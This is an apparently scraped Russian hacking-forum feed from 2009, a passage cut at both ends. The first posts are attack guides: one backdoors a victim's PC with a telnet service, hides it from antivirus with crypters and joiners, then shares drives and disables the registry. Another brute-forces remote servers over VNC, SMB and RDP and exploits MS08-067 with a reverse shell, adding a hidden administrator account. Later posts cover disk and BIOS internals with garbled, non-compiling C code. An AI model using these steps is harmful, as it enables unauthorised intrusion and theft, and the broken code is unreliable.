при его запуске вылетает <br />консольное черное окно, говорящее о выполняемых процессах в командной строке. Но <br />не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler <a href="http://ifolder.ru/7197807." rel="nofollow" target="_blank">http://ifolder.ru/7197807.</a> Она <br />компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник <br />превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле. <br />Вроде готово... Но не совсем, ты же не будешь дарить пустой экзешник, поэтому <br />бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно <br />скачать тут <a href="http://ifolder.ru/7198272" rel="nofollow" target="_blank">http://ifolder.ru/7198272</a> pohernah107(13 кб) а джойнер можешь взять здесь <a href="http://ifolder.ru/7197872" rel="nofollow" target="_blank">http://ifolder.ru/7197872</a> <br />RedBindeR_v1.3_Mod(460 кб) . Они помогут тебе склеить файлы в один и изменить <br />сигнатуру дабы не палится антивирусами. <br />Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы <br />тебе осталось только подключится к телнету через указанный тобой порт. Бывает <br />так что жертва находится в глобальной сети www у которой IP динамический, в этом <br />случаи, зная диапазон IP его провайдера можно просканировать эту сеть на <br />открытый наш редко используемый 972 Порт. А чтобы знать когда твой &quot;друг&quot; <br />в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.<br />Осталось подключится. Для этого можешь выбрать стандартный виндосовский <br />клиент который находится тут c:WINDOWSsystem32telnet.exe. <br />Запускаешь. Пишешь:<br />Microsoft Telnet&gt; o 192.168.1.24[IP жертвы] 972[порт]<br />если пишет:<br />Welcome to Microsoft Telnet Service<br />login:_<br />то всё акей =))<br />Вводишь:<br />login: hacker<br />password: hack<br />Появляется надпись:<br />*=====================================================<br />Вас приветствует Telnet-сервер производства корпорации Майкрософт<br />*=====================================================<br />C:&gt;_</p> <p>Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь <br />управлять кампом, отдавая команды...<br />Можно к примеру расшарить диски:</p> <p>C:&gt;net share disk_c=c: &gt; nul<br />C:&gt;net share disk_d=d: &gt; nul<br />C:&gt;net share disk_e=e: &gt; nul</p> <p>перезагрузить комп:<br />C:&gt;shutdown -r -t 1 -c -f</p> <p>прописать какой-нибудь ключ реестра:<br />C:&gt;reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v <br />DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему</p> <p>или поднять ftp сервер и залить радмина для более удобного удаленного <br />администрирования:<br />C:&gt;ftp <br />В общем-то, здесь уже играет фантазия взломщика =)</p> <p>Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.</p> <p>P.S. На все непонятные термины и выражения есть Гугл. </p> <p>Внимание!!! Данная статья - это не побуждение к действию, все описанное здесь <br />попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей <br />информационной безопасности</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 16:13:06 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=34#p34 http://xhackx.bbon.ru/viewtopic.php?pid=33#p33 <p>Доброго времени суток!</p> <p>И так преступим, дедик он же dedicated server это выделенный сервер(подробнее смотрим на <a href="http://ru.wikipedia.org" rel="nofollow" target="_blank">http://ru.wikipedia.org</a>). Рассматривать мы будем брут. Следовательно мы будем искать открытые порты 445,139,3389,5900. На машинах с этими открытыми портами можно&#160; получить доступ к удаленному рабочему столу.</p> <p>Начнем пожалуй с порта 5900 он же VNC. Цель для взлома как и все последующие&#160; мы будем искать с помощью сканера Angry IP scanner. Его интерфейс интуитивно понятен (вводим начальный и конечный IP для сканирования, и нажав на стрелочку возле кнопки Start выбираем нужный порт(нажимаем на кнопку рядом с Scan Ports и вводим порт)). Далее нажимаем старт и ждем когда сканер найдет и выдаст нам IP потенциальных жертв. Для удобства в настройках можно указать, чтобы отображались только IP которые онлайн и у них открыт нужный нам порт. Далее берем программу services.exe неизвестного мне автора. С помощью неё мы будем пытаться взломать дедики в каталоге с программой есть такие файлы как:</p> <p>bad.txt - деды к которым пасс не подошел</p> <p>good.txt - деды к которым пасс подошел</p> <p>list.txt - ip дедиков которые мы пытаемся взломать</p> <p>pass.txt - пассворд лист</p> <p>option.ini - файл с настройками программы<br />GENERAL]<br />UIN=icq uin бота<br />PASS=пароль от номера бота<br />PassFile=pass.txt - файл с пассами.<br />UinSend= icq uin на который автоматом высылать гуды.<br />ListFile=list.txt - файл с ip адресами.<br />В самой программе нужно нажать только на кнопочку Start. Ну вобщем-то все, далее сами разберетесь.</p> <p>Взлом дедиков с открытым 139,3389 портом аналогичен. Только софт другой. В качестве брута мы будем использовать Ntscan. В нем практически все также.<br />NT_user.dic - файл с логинами для брута.<br />NT_pass.dic - файл с паролями для брута.<br />host.txt - файл с IP дедиков для брута (надо создать вручную и выбрать при указании параметров брута)<br />В самой программе указываем нужный нам диапазон IP (если предварительно не отобрали дедики для брута), порт,количество потоков, тайм аут...Ну и вроде как все, нажимаем Start и радуемся...</p> <p>И так теперь взлом компьютеров с открытым 445 портом. Находим мы их как и все остальные с помощью сканера портов. Использовать мы будем уязвимость MS08-067_netapi присутствующую Sp SP2SP3 Pro. с помощью Metasploit 3.2.<br />Заходим Metasploit 3.2&gt;GUI&gt;Exploits&gt;Windows&gt;SMB&gt;MS08-067_netapi (подробно о использовании Metasploit можно почитать в статьях -=Lebed=-), Payloads =generic/shell_reverse_tcp</p> <p>Мы получаем консоль жертвы, с помощью FTP закачиваем настроенный RAdmin и потом через консоль радмина</p> <p>cmd<br />net user user pass /add<br />net localgroup Administrators user /add<br />net localgroup &quot;Remote Desktop Users&quot; user /add<br />net accounts /maxpwage:unlimited<br />exit</p> <p>создаем нового пользователя...<br /> </p> <p>Файлы к архиву: <a href="http://www.webfile.ws/d/7875" rel="nofollow" target="_blank">http://www.webfile.ws/d/7875</a><br />Пароль:hackzone.ru<br /> </p> <p>________________<br />ps<br />Инфа для редких новичков!<br />Все выше написанно с использованием метериалов AllenZ,stopxaker,Realix...Честь им и хвала!<br />зы2<br />все написанно только в целях ознакомления и бла-бла-бла...</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 16:09:58 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=33#p33 http://xhackx.bbon.ru/viewtopic.php?pid=32#p32 <p>Устройство жесткого диска</p> <p>На нем по физическому адресу 0-0-1 располагается главная загрузочная запись (MBR). В структуре MBR находятся следующие элементы:</p> <p>&#160; &#160; * Внесистемный загрузчик (NSB);<br />&#160; &#160; * Таблица описания разделов диска (таблица разделов, PT).<br />&#160; &#160; &#160; Располагается в MBR по смещению 0x1BE и занимает 64 байта; Таблица разделов описывает размещение и характеристики имеющихся на винчестере разделов. Разделы диска могут быть двух типов - primary (первичный, основной) и extended (расширенный). Максимальное число primary-разделов равно четырем. Наличие на диске хотя бы одного primary-раздела является обязательным. Extended-раздел может быть разделен на большое количество подразделов - логических дисков.<br />&#160; &#160; * Сигнатура MBR. Последние два байта MBR должны содержать число 0xAA55.<br />&#160; &#160; &#160; Т.е. структура MBR выглядит так: программа анализа таблицы разделов и загрузки System Bootstrap с активного раздела (смещение 0, размер 446) --&gt; Partition 1/2/3/4 entry ( элемент таблицы разделов) (Смещение для первого 0x1BE, размер каждого 16), Сигнатура 0xAA55 (Смещение - 0x1FE, размер 2)</p> <p>Partition entry выглядит так:</p> <p>- признак активности (0 - раздел не активный, 0x80 - раздел активный). Он служит для определения, является ли раздел системным загрузочным и есть ли необходимость производить загрузку операционной системы с него при старте компьютера. Активным может быть только один раздел. Элемент первичного раздела указывает сразу на загрузочный сектор логического диска (в первичном разделе всегда имеется только один логический диск), а элемент расширенного раздела - на список логических дисков, составленный из структур, которые именуются вторичными MBR (SMBR). SMBR имеет структуру, аналогичную MBR, но загрузочная запись у него отсутствует (заполнена нулями), а из четырех полей описателей разделов используются только два. Первый элемент раздела при этом указывает на логический диск, второй элемент указывает на следующую структуру SMBR в списке. Последний SMBR списка содержит во втором элементе нулевой код раздела. (1 байт)<br />- Номер головки диска, с которой начинается раздел. (1 байт)<br />- Номер цилиндра и номер сектора, с которых начинается раздел. Биты 0-5 содержат номер сектора, биты 6-7 - старшие два бита 10-разрядного номера цилиндра, биты 8-15 - младшие восемь битов номера цилиндра. (2 байта)<br />- Код типа раздела System ID. Указываюет на принадлежность данного раздела к той или иной операционной системе. (1 байт)<br />- Номер головки диска, на которой заканчивается раздел (1 байт)<br />- Номер цилиндра и номер сектора, которыми заканчивается раздел Три байта на каждый номер. (2 байта)<br />- Абсолютный (логический) номер начального сектора раздела, т.е. число секторов перед разделом (4 байта)<br />- Размер раздела (число секторов). Размер раздела в секторах (4 байта)</p> <p>Теперь можно подобраться чуть ближе к практике. Рассмотрим модуль для Linux, показывающий информацию обо всех раздела жесткого диска.</p> <p>#define signt 0xAA55<br />#define DEV &quot;/dev/hda&quot;<br />#define pt_s 0x10 // размер элемента таблицы разделов<br />struct stype { u8 part_type; u8 *part_name; }; // Соответствие кода раздела с его символьным отображением<br />struct stype 386_stype[] = {<br />{0x00, &quot;Empty&quot;},<br />{0x01, &quot;FAT12&quot;},<br />{0x04, &quot;FAT16 &lt;32M&quot;},<br />{0x05, &quot;Extended&quot;}, /* DOS 3.3 */<br />{0x06, &quot;FAT16&quot;}, /* DOS при &gt;=32M */<br />{0x0b, &quot;Win95 FAT32&quot;},<br />{0x0c, &quot;Win95 FAT32 (LBA)&quot;},<br />{0x0e, &quot;Win95 FAT16 (LBA)&quot;},<br />{0x0f, &quot;Win95 Ext'd (LBA)&quot;},<br />{0x82, &quot;Linux swap&quot;}, /* и для солярис */<br />{0x83, &quot;Linux&quot;},<br />{0x85, &quot;Linux extended&quot;},<br />{0x07, &quot;HPFS/NTFS&quot;} }; // Именно такая таблица принята для файловых систем<br />#define p_n (sizeof(386_stype) / sizeof(386_stype[0])) // определяем здесь число элементов в массиве, что определен выше.<br />int disk; // дескриптор файла устройства<br />u8 mbr[512]; // сюда считаем MBR<br />struct pt { u8 boot; u8 startp[3]; u8 typep; u8 endp[3]; u32 sectbef; u32 secttot; } pt_k[max]; // Структура по таблице разделов<br />#define max 20 // max логических дисков<br />// Главная функция:<br />int main()<br />{<br />int i = 0;<br />u64 sk;<br />// Открываем файл устройства, получаем таблицу разделов, потом сверяем сигнатуру:<br />hard = open(DEV, O_RDONLY);<br />if(disk &lt; 0) {<br />perror(&quot;open&quot;);<br />exit(-1);<br />}<br />rmaintab();<br />if(csign() &lt; 0) {<br />printf(&quot;Invalid sign!\n&quot;);<br />exit(-1);<br />}<br />// Поиск идентификатора расширенного раздела. Если есть – считаем смещение и получаем информацию по логическим разделам.</p> <p>for(; i &lt; 4; i++) {<br />if((pt_k[i].typep == 0xF) || \<br />(pt_k[i].typep == 0x5) || \<br />(pt_k[i].typep == 0x0C)) {<br />sk = (u64)pt_k[i].sectbef * 512;<br />rexttab(sk);<br />break;<br />}<br />}</p> <p>// Отображаем информацию:</p> <p>showinf();<br />return 0;<br />}</p> <p>// Проверка сигнатуры 0xAA55:<br />int csign()<br />{<br />u16 sign = 0;<br />memcpy((void *)&amp;sign, (void *)(mbr + 0x1FE), 2);<br />#ifdef DEBUG printf(&quot;Sign - 0x%X\n&quot;, sign);<br />#endif<br />if(sign != SIGNT) return -1;<br />return 0;<br />}<br />// Чтение таблицы разделов:<br />void rmaintab()<br />{<br />if(read(disk, mbr, 512) &lt; 0) {<br />perror(&quot;read&quot;);<br />close(disk);<br />exit(-1);<br />}<br />memset((void *)pt_k, 0, (PT_SIZE * 4));<br />memcpy((void *)pt_k, mbr + 0x1BE, (pt_s * 4));<br />return;<br />}<br />// Чтения расширенной таблицы разделов:<br />void rexttab(u64 sk)<br />{<br />int number = 4; // С этой позиции pt_k будет заполняться информацией о логических дисках<br />u8 smbr[512];<br />// Она принимает один параметр sk - смещение к расширенному разделу от начала диска. Для получения информации о логических дисках воспользуемся циклом:<br />for(;;number++) {<br />// Читаем SMBR, по offset seek от начала диска:<br />memset((void *)smbr, 0, 512);<br />pread64(hard, smbr, 512, sk);<br />// Заполним часть pt_k. Первый элемент будет указывать на логический диск, а следующий - на следующую структуру SMBR:<br />memset((void *)&amp;pt_k[number], 0, PT_SIZE * 2);<br />memcpy((void *)&amp;pt_k[number], smbr + 0x1BE, pt_size * 2);<br />// Поправка в поле &quot;Номер начального сектора&quot; - отсчет ведется от начала диска:<br />pt_k[number].sectbef += (sk / 512);<br />// Код типа раздела равен нулю? Больше логических дисков нет!<br />if(!(pt_k[number + 1].typep)) break;<br />// Offset к следующей SMBR:<br />sk = ((u64)(pt_k[number].sectbef + pt_k[number].secttot)) * 512;</p> <p>}</p> <p>return;<br />}</p> <p>// Покажем информацию о найденных логических дисках:<br />void showinf()<br />{<br />int i = 0, n;<br />printf(&quot;Num - %d\n&quot;, P_N);<br />for(; i &lt; max; i++) {<br />if(!pt_k[i].typep) break;<br />printf(&quot;\nType %d - &quot;, i);<br />for(n = 0; n &lt; P_N; n++) {<br />if(pt_k[i].typep == 386_stype[n].typep) {<br />printf(&quot;%s\n&quot;, 386_stype[n].namep);<br />break;<br />}<br />}<br />if(n == P_N) printf(&quot;Unknown\n&quot;);<br />printf(&quot; Boot flag - 0x%X\n&quot;, pt_k[i].bootable);<br />printf(&quot; Number of sectors in partition%d - %d\n&quot;, i, pt_k[i].secttot);<br />printf(&quot;Number of sector before partition%d - %d\n\n&quot;, i, pt_k[i].sectbef);<br />}<br />return;<br />}</p> <p>Интерфейс АТА</p> <p>А теперь опять к теории… У каждого диска есть стандартный набор регистров, состоящий из двух блоков: командных регистров и управляющих регистров. Первый служит для посылки команд устройству и передачи информации о его состоянии. Состав блока командных регистров:</p> <p>1. Регистр состояния/команд – в режиме read_only отражает текущее состояние устройства в процессе выполнения команды. Чтение регистра состояния разрешает дальнейшее изменение его бит и сбрасывает запрос аппаратного прерывания. В режиме write принимает коды команд для выполнения.</p> <p>Назначение бит регистра состояния:</p> <p>Бит 7 - BSY указывает на занятость устройства. При =1 игнорирует попытки записи в блок командных регистров. При =0 регистры командного блока доступны.<br />Бит 6 - DRDY указывает на готовность устройства к восприятию любых кодов команд.<br />Бит 5 - DF - индикатор отказа устройства.<br />Бит 4 - DSC - индикатор завершения поиска трека.<br />Бит 3 - DRQ - индикатор готовности к обмену словом или байтом данных.<br />Бит 2 - CORR - индикатор исправленной ошибки данных.<br />Бит 1 - IDX - индекс, трактуется специфично для каждого производителя.<br />Бит 0 - ERR - индикатор ошибки выполнения предыдущей операции. Дополнительная информация содержится в регистре ошибок.</p> <p>2. Регистр номера цилиндра и номера сектора.<br />3. Регистр номера устройства и головки.</p> <p>Биты 7 и 5 - зарезервированы.<br />Бит 6 - единичным значением указывает на применение режима адресации LBA. При нулевом значении бита используется режим CHS.<br />Бит 4 - DEV - выбор устройства. При DEV=0 выбрано устройство Master, при DEV=1 - устройство- Slave.<br />Биты 3-0 имеют двоякое назначение в зависимости от выбранной системы адресации. В режиме CHS они содержат номер головки, в режиме LBA - старшие биты логического адреса.</p> <p>4. Регистр данных.<br />5. Регистр ошибок.<br />6. Регистр свойств.<br />7. Регистр счетчика секторов содержит число секторов, участвующих в обмене.</p> <p>Блок управляющих регистров - для управления устройством и получения байта его состояния. В состав блока входят альтернативный регистр состояния и регистр управления устройством. Альтернативный регистр состояния имеет те же биты, что и основной, но его чтение не приводит ни к каким изменениям состояния устройства.</p> <p>В регистре управления устройством биты 7-3 зарезервированы, бит 0 всегда нулевой, используются только два бита:<br />Бит 2 - SRST - программный сброс, действует все время, пока бит не будет сброшен.<br />Бит 1 - IEN# - инверсный бит разрешения прерывания.</p> <p>Рассмотрим теперь взаимодействие хоста и устройства:</p> <p>1. Хост читает регистр состояния устройства, дожидаясь нулевого значения бита BSY.<br />2. Дождавшись освобождения устройства, хост записывает в регистр номера устройства и головки байт, у которого бит DEV указывает на адресуемое устройство.<br />3. Хост читает основной регистр состояния адресованного устройства, дожидаясь признака его готовности (DRDY = 1).<br />4. Хост заносит требуемые параметры в блок командных регистров.<br />5. Хост записывает код команды в регистр команд.<br />6. Устройство устанавливает бит BSY и переходит к исполнению команды.</p> <p>Для команд, не требующих передачи данных (ND):</p> <p>7. Завершив исполнение команды, устройство сбрасывает бит BSY и устанавливает запрос прерывания. К этому моменту в регистрах состояния и ошибок уже имеется информация о результате выполнения.</p> <p>Для команд, требующих чтения данных в режиме PIO:</p> <p>7. Подготовившись к передаче первого блока данных по шине АТА, устройство устанавливает бит DRQ. Если была ошибка, она фиксируется в регистрах состояния и ошибок. Далее устройство сбрасывает бит BSY и устанавливает запрос прерывания.<br />8. Зафиксировав обнуление бита BSY (или по прерыванию), хост считывает регистр состояния, что приводит к сбросу прерывания от устройства.<br />9. Если хост обнаружил единичное значение бита DRQ, он производит чтение первого блока данных в режиме PIO (адресуясь к регистру данных). Если обнаружена ошибка, считанные данные могут быть недостоверными.</p> <p>Не утомились нудной частью? Возвращаемся к практике. Задача в общем-то такая же - получить информацию идентификации устройства и считать MBR.</p> <p>#include &lt;stdio.h&gt;<br />#include &lt;fcntl.h&gt;<br />#include &lt;unistd.h&gt;<br />#include &lt;linux/hdreg.h&gt;<br />#define d_data 0x1f0 // регистр данных<br />#define d_error 0x1f1 // регистр ошибок<br />#define d_nsector 0x1f2 // регистр счетчика секторов<br />#define d_sector 0x1f3 // регистр стартового сектора<br />#define d_lcyl 0x1f4 // регистр младшего байта номера цилиндра<br />#define d_hcy 0x1f5 // регистр старшего байта номера цилиндра<br />#define d_current 0x1f6 // 101a???? , a=устройство, ????=головка<br />#define d_status 0x1f7 // регистр состояния</p> <p>#define out(val,port)<br />asm(<br />&quot;outb %%al, %%dx&quot;<br />::&quot;a&quot;(val),&quot;d&quot;(port)<br />)<br />#define in_byte(val,port)<br />asm(<br />&quot;inb %%dx, %%al&quot;<br />:&quot;=a&quot;(val)<br />:&quot;d&quot;(port)<br />)</p> <p>#define in_word(val,port)<br />asm(<br />&quot;inw %%dx, %%ax&quot;<br />:&quot;=a&quot;(val)<br />:&quot;d&quot;(port)<br />)<br />// Чтение байта из порта, запись байта в порт и запись слова в порт соответственно.</p> <p>void d_busy()<br />{<br />unsigned char stat;</p> <p>do {<br />in_b(stat,d_status);<br />} while (stat &amp; 0x80);<br />return;<br />}<br />void d_ready()<br />{<br />unsigned char stat;</p> <p>do {<br />in_b(stat,d_status);<br />} while (!(stat &amp; 0x40));<br />return;<br />}<br />// Занято устройство или свободно?<br />void cerr()<br />{<br />unsigned char a;</p> <p>ib_b(a,d_status);<br />if (a &amp; 0x1) {<br />perror(&quot;d_status&quot;);<br />exit(-1);<br />}<br />return;<br />}<br />// Не было ошибок?</p> <p>void gident(struct d_drive *hd)<br />{</p> <p>unsigned short b = 0;<br />int i = 0;</p> <p>unsigned short buf[0x100];<br />memset(buf,0,0x100);<br />d_busy();<br />// Когда станет свободно, в регистр номера устройства и головки заносим значение 0xA0. Бит 4 равен 0, а значит, нами выбрано ведущее устройство. Бит 6 оставим нулевым:<br />out_b(0xA0,d_current);<br />hd_ready();<br />// Теперь диск полностью готов. В регистр команд заносим код команды идентификации устройства - 0xEC.<br />Out_b(0xEC,d_status);<br />// Считываем информацию по блоку данных:<br />do {<br />hd_busy();<br />cerr();<br />in_w(a,d_data);<br />if((i&gt;=10 &amp;&amp; i&lt;=19) || (i&gt;=27 &amp;&amp; i&lt;=46))<br />asm(<br />&quot;xchgb %%ah, %%al&quot;<br />:&quot;=a&quot;(a)<br />:&quot;0&quot;(a));<br />buf[i++] = a;<br />} while(d_request());</p> <p>// Считанную информацию сохраним в буфере buff1. Копируем полученную информацию из буфера buff1 в структуру dreg. После чего чистим буфер.<br />memcpy(hd,(struct dreg *)buf,0x100);<br />memset(buf,0,0x100);<br />return;<br />}</p> <p>Теперь рассмотрим чтение при адресация CHS</p> <p>void r_chs(unsigned short N, unsigned short sect,<br />unsigned short cyl, unsigned short head, unsigned short *buf)<br />// N - число секторов для чтения, sect - стартовый сектор, cyl - стартовый цилиндр, head - номер головки, buf - буфер, куда все помещается.<br />{</p> <p>int i = 0;<br />unsigned short a;</p> <p>if((!N) || (!sect)) return;<br />hd_busy();<br />// В регистр номера устройства и головки заносим соответствующие данные.<br />Out_b(0xA0|head,d_current);<br />hd_ready();<br />// Заполним блок командных регистров:<br />out_b(N,d_nsector);<br />out_b(sect,d_sector);<br />out_b(cyl,d_cyl);<br />out_b((cyl &gt;&gt; 8),d_cyl);<br />// В регистр команд записываем код команды чтения секторов с повторами - 0x20.<br />out_b(0x20,d_status);<br />// Считываем блок данных в буфер buf:<br />do {<br />hd_busy();<br />cerr();<br />in_w(a,d_data);<br />buf[i++] = a;<br />} while(d_request());<br />// Считываем последние 4 байта и выходим из функции:<br />In_w(a,d_data);<br />buf[i++] = a;<br />in_w(a,d_data);<br />buf[i] = a;<br />return;<br />}</p> <p>// Чтения сектора в режиме адресации LBA.<br />void read_hd_sector_lba(unsigned short N, unsigned int lba, unsigned short *buf)<br />{<br />// N - число секторов для чтения, lba - номер блока, buf - буфер, куда все помещается</p> <p>int i = 0;<br />unsigned short a;</p> <p>if(!N) return;<br />hd_busy();<br />// В регистре номера устройства и головки бит 6 устанавливаем в 1, а биты 3-0 будут содержать старшие биты логического адреса (27-24):<br />out_b(0xE0|((lba &amp; 0x0F000000) &gt;&gt; 24),d_current);<br />hd_ready();<br />// В блок командных регистров заносим требуемые параметры. В регистр младшего байта номера цилиндра - биты 15-8 логического адреса, а в регистр старшего байта номера цилиндра - биты 23-16 логического адреса. В регистр команд - команду чтения секторов с повторами.<br />out_b(N,d_sector);<br />out_b((lba &amp; 0x000000FF),d_sector);<br />out_b(((lba &amp; 0x0000FF00) &gt;&gt; 8),d_cyl);<br />out_b(((lba &amp; 0x00FF0000) &gt;&gt; 16),d_cyl);<br />out_b(0x20,d_status);<br />do {<br />d_busy();<br />cerr();<br />in_w(a,d_data);<br />buf[i++] = a;<br />} while(d_request());<br />in_w(a,d_data);<br />buf[i++] = a;</p> <p>in_w(a,d_data);<br />buf[i] = a;</p> <p>return;<br />}</p> <p>Рассмотрим главную функцию, на этом и закончим текст программы.</p> <p>int main ()<br />{<br />// N - число секторов для чтения, sect - номер сектора, cyl - номер цилиндра, head - номер головки, lba - номер логического блока<br />struct d_drive hd;<br />int out;<br />unsigned short N = 1;<br />unsigned int sect, cyl, head, lba;</p> <p>unsigned short buf[0x100*N];</p> <p>memset(buf,0,0x100*N);<br />memset(&amp;hd,0,sizeof(struct d_drive));</p> <p>// Во избежание лишних ошибок запросим у системы разрешения доступа к портам в диапазоне 0x1f0 - 0x1f7:<br />ioperm(0x1f0,8,1);<br />getident(&amp;hd);<br />// Вуаля:<br />printf(&quot;Number - %s\n&quot;,hd.serial_no);<br />printf(&quot;Model - %s\n&quot;,hd.model);<br />printf(&quot;Cyl count - %d\n&quot;,hd.cur_cyls);<br />printf(&quot;Head count - %d\n&quot;,hd.cur_heads);<br />printf(&quot;Sector count - %d\n&quot;,hd.cur_sectors);<br />printf(&quot;Blocks count - %d\n&quot;,hd.lba_capacity);</p> <p>Прочтение MBR в режиме CHS:</p> <p>sect = 1;<br />cyl = 0;<br />head = 0;<br />r_chs(N,sect,cyl,head,buf);</p> <p>Тоже самое - в режиме LBA:</p> <p>lba = 0;<br />r_lba(N,lba,buf);<br />ioperm(0x1f0,8,0);</p> <p>Вот и вся программа. Пожалуй, на этом очередную часть можно закончить, в следующей части будет продолжение работы с жесткими дисками, а точнее описание работы с файловой системой, а так же, наверное, мы затронем работу с CD.</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:59:02 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=32#p32 http://xhackx.bbon.ru/viewtopic.php?pid=31#p31 <p>Немного занудства</p> <p>В этой серии статей я хотел бы рассказать о написании собственной ОС (прошу подождать с истерическим смехом по этому поводу). Конечно же, не на самом подробном уровне, тем не менее, какие-то азы, с которых будет полезно стартовать, я все же постараюсь рассказать. Я сразу хочу заметить, что я предполагаю, что некоторый опыт в программировании на Assembler у вас имеется, а так же вы знаете такие базовые понятия как сегментная память, реальный режим и пр. (Если нет, советую почитать для начала книгу Зубкова)</p> <p>Итак, начнем. Давайте рассмотрим приблизительно работу известных ОС.</p> <p>Немного теории</p> <p>Адресное пространство в DOS:<br />Объем &#160; &#160; Физ. Адрес Сегм. Адрес<br />1Кбайт Векторы прерываний 00000h 0000h<br />256байт Область данных BIOS 00400h 0040h<br /> ОС MS-DOS 00500h 0050h<br /> Область для программ<br />64Кбайт Графический видео буфер A0000h A000h<br />32Кбайт Свободные адреса B0000h B000h<br />32Кбайт Текстовый видеобуфер B8000h B800h<br />64Кбайт ПЗУ-расширения BIOS C0000h C000h<br />128Кбайт Свободные адреса D0000h D000h<br />64Кбайт ПЗУ BIOS F0000h F000h<br />64Кбайт HMA 100000h<br />До4Гбайт XMS 10FFF0h</p> <p>Первые 640 Кбайт (до графического видеобуфера) называются стандартной (conventional) памятью. Начинается стандартная память с килобайта, который содержит векторы прерываний, их 256 на каждый отводится по 4 байта. Затем идет область данных BIOS (при включение компьютера BIOS выполняет POST – диагностику, которая проверяет все оборудование на наличие ошибок, если проверка завершилась удачно то BIOS грузит самый первый сектор (там находится загрузочная программа ОС) с выбранного устройства (дискеты, винчестера) по адресу 0x7C00h куда и передает управление). Где находятся данные необходимые для корректной работы функций BIOS. Но также можно модифицировать эту область, тем самым мы влияем на ход выполнения системных функций, по сути дела меняя что либо в этой области мы передаем параметры BIOS и его функциям, которые становятся более гибкими. В случае установленной DOS с сегментного адреса 500h начинается сама операционная система. После ОС до 640 Кбайт находятся прикладные или системные программы, которые были загружены ОС. </p> <p>За 640 килобайтами начинается старшая память или верхняя (upper) память, она располагается до 1 мегабайта (до HMA), т.е. она составляет 384 Кбайт. Тут располагаются ПЗУ (постоянно запоминающее устройство ) : текстовый видеобуфер (его микросхема рассчитана на диапазон B8000h…BFFFFh) и графический видеобуфер (A0000h…AFFFFh). Если требуется вывести текст то его ASCII коды требуется прописать в текстовый видеобуфер и вы немедленно увидите нужные символы. F0000h…FFFFFh, а вот и сам BIOS. Так же есть еще одна ПЗУ – ПЗУ расширений BIOS (C0000h…CFFFFh), её задача обслуживание графических адаптеров и дисков.</p> <p>За первым мегабайтом, с адреса 100000h, располагается память именуемая как расширенная память, конец которой до 4 гигабайт. Расширенная память состоит из 2х подуровней: HMA и XMS. Высокая память (High Memory Area, HMA) доступна в реальном режиме, а это еще плюс 64 Кбайт (точнее 64 Кбайт – 16 байт), но для этого надо разрешить линию A20 (открыв вентиль GateA20). Функционирование расширенной памяти подчиняется спецификации расширенной памяти (Expanded Memory Specification, XMS), поэтому саму память назвали XMS-памятью, но она доступна только в защищенном режиме.</p> <p>Давайте вернемся к началу адресного пространства в представлении DOS и рассмотрим его более подробно.</p> <p>1) Векторы прерываний таковы (это нам понадобится, когда мы будем составлять свою таблицу прерываний):</p> <p>IRQ INT Причина возникновения<br />IRQ0 8h Системный таймер<br />IRQ1 9h Клавиатура<br />IRQ2 10h Ведомый контроллер<br />IRQ3 11h Порт COM2, модем<br />IRQ4 12h Порт COM1, мышь<br />IRQ5 13h Порт LPT2<br />IRQ6 14h Дисковод<br />IRQ7 15h Порт LPT1, принтер<br />IRQ8 70h Часы реального времени<br />IRQ9 71h Прерывание обратного хода луча<br />IRQ10 72h Для дополнительных устройств<br />IRQ11 73h Для дополнительных устройств<br />IRQ12 74h PS мышь<br />IRQ13 75h Ошибка математического сопроцессора<br />IRQ14 76h Первый IDE-контроллер<br />IRQ15 77h Второй IDE-контроллер, жесткий диск</p> <p>2) BIOS. Это в общем-то лирическое отступление, т.к. здесь мы рассмотрим не столько устройство BIOS, сколько научимся добавлять в него свои функции. Использование таковых, конечно, сделает нашу ОС, непереносимой, но для начального этапа они могут оказаться очень полезными. В написании ОС я больше не буду упоминать об этом, это остается пытливому читателю в виде самостоятельного упражнения. =)</p> <p>Итак, BIOS (я буду говорить об AWARD BIOS, так как это наиболее популярные версии, поэтому возможно незначительные расхождения с другими BIOS) – это последовательность запакованных файлов, которые заканчиваются файлом bootblock. Структура первого мегабайта памяти, отведенного под BIOS такова:<br />00000 – xxxxx+1 original.tmp и байт под CRC<br />xxxxx+1 – yyyyy Запакованный модуль<br />yyyyy – zzzzz Другие запакованные модули<br />zzzzz - ~17FFEh Оставшееся свободным пространство<br />~1C000* – 1FFFFh&#160; &#160; Bootblock</p> <p>До свободного пространства идет основная часть BIOS, а именно:</p> <p>original.tmp – главная часть, в которой располагается подпрограмма BIOS Setup, а так же части, необходимые для инициализации.<br />CRC – контрольная сумма BIOS<br />awardext.rom – подпрограмма вывода конфигурации компьютера<br />awardepa.bin – изображение<br />Так же могут встречаться другие необязательные модули.</p> <p>Итак, при включении компьютера bootblock инициализирует регистры чипсета, распаковывает заархивированные (с помощью LHA) модули и отправляет их в память. Соответственно данные файлы можно перепрограммировать, изменив или добавив что-то в BIOS. Таким образом можно изменить все настройки БИОС (начиная от надписей и кончая добавлением возможности работы с новыми устройствами, информации о которых нет в данной версии BIOS). Делается это достаточно легко: например используя modbin (стандартная программа от Award) можно распаковать данные файлы (взятые, например, из Интернета), изменить их по своему усмотрению и записать в BIOS. Только при изменении заархивированных модулей не забывайте исправлять CRC, иначе BIOS подумает, что он испорчен.</p> <p>Итак, что же нужно для более серьезной перепрошивки BIOS нежели незначительного изменения уже существующих кодов. Во-первых я напомню вам, что существует множество компаний, производящий материнские платы, а так же процессоры, а единого стандарта для чипсетов не существует, поэтому написать универсальный BIOS ко всем материнским платам не возможно, необходимо написать для каждой материнской платы 